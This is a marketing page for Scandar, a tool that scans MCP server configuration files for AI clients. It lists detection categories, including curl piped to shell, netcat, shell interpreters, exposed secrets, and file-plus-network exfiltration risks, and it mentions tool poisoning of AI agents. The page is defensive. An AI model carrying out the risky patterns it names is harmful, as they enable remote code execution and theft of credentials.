CONFIG SCANNER

Your config decides what
runs on your machine.

MCP config files control which servers launch, what commands they run, and what secrets they access. A single misconfigured entry can pipe curl to shell, expose API keys, or open your system to the network. Scandar audits your config before anything starts.

Scan a Config FileRead the Docs
WHAT IT DETECTS

6 threat categories for config files.

Insecure Transport
Detects HTTP connections to remote servers, missing TLS, and servers binding to 0.0.0.0 (exposed to the network).
Dangerous Commands
Flags shell interpreters (bash -c), sudo, curl piped to shell, netcat, and other unsafe command patterns.
Untrusted Sources
Catches raw GitHub URLs, git+ repos, raw IP addresses, non-standard ports, and npx -y auto-install patterns.
Secret Exposure
Identifies hardcoded API keys, bearer tokens, AWS credentials, and secrets that should use env var interpolation.
Dangerous Combinations
Cross-server analysis: file access + network = exfiltration risk, credentials + network = theft risk, shell + others.
Misconfiguration
Detects servers with no command or URL, empty args on runners like npx/uvx, and invalid JSON configurations.
SUPPORTED FORMATS

Works with every major MCP client.

Claude Desktopclaude_desktop_config.json
Claude Code.mcp.json
Cursormcp.json
Windsurfmcp_config.json
VS Codemcp.json
CustomAny JSON with mcpServers key
HOW IT WORKS

Layer 1 pattern analysis. Instant results.

Config files are structured JSON — no LLM needed. Scandar parses your config, inspects every server entry for dangerous patterns, checks secrets against env var interpolation, and analyzes cross-server capabilities for dangerous combinations. Results in milliseconds.

1
Parse
Detects flat and nested mcpServers formats
2
Inspect
25+ rules across 6 threat categories
3
Cross-check
Analyzes server capability combinations
4
Score
Trust score with per-finding severity
ALSO ON SCANDAR
MCP Server Scanner
Deep analysis of MCP server source code. Detect tool poisoning, hardcoded secrets, unsafe execution, and more.
CLI
Run config scans from your terminal or CI/CD pipeline. Auto-detects .mcp.json, claude_desktop_config.json, and more.

Scan Your MCP Config

Drop your config file or paste the JSON. Results in milliseconds.

Scan a Config File
ENTERPRISE

Need fleet-wide AI security?

Scandar Overwatch gives you real-time visibility into every agent in your organization — policies, compliance reports, alert routing, and kill chain detection. Self-serve setup in 25 minutes.

Explore Overwatch →